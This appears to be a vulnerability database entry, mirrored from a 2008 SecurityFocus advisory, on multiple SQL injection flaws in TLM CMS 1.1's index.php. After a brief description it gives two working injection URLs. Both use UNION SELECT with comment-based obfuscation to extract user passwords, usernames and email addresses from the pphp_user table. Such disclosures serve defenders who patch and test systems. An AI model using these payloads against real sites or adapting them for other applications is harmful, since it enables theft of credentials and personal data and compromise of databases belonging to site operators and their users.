TLM CMS 1.1 - index.php Multiple SQL Injections

2008-05-05T00:00:00
ID EXPLOITPACK:FAF47FC328C0FD10F4ADD3B6DB8D40C1
Type exploitpack
Reporter ZoRLu
Modified 2008-05-05T00:00:00

Description

TLM CMS 1.1 - index.php Multiple SQL Injections

                                        
                                            source: https://www.securityfocus.com/bid/29049/info

TLM CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

TLM CMS 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Photo-Photo&ID=1'/**/union/**/select/**/0,1,concat(US_pwd),concat(US_pseudo),concat(US_mail)/**/from/**/pphp_user/*
http://www.example.com/tlmcms_v1-1/tlmcms/index.php?affiche=Comment&act=lire&idnews=-99999999/**/union/**/select/**/0,1,concat(US_mail),concat(US_pseudo),concat(US_pwd),5,6,7,8,9,10/**/from/**/pphp_user/*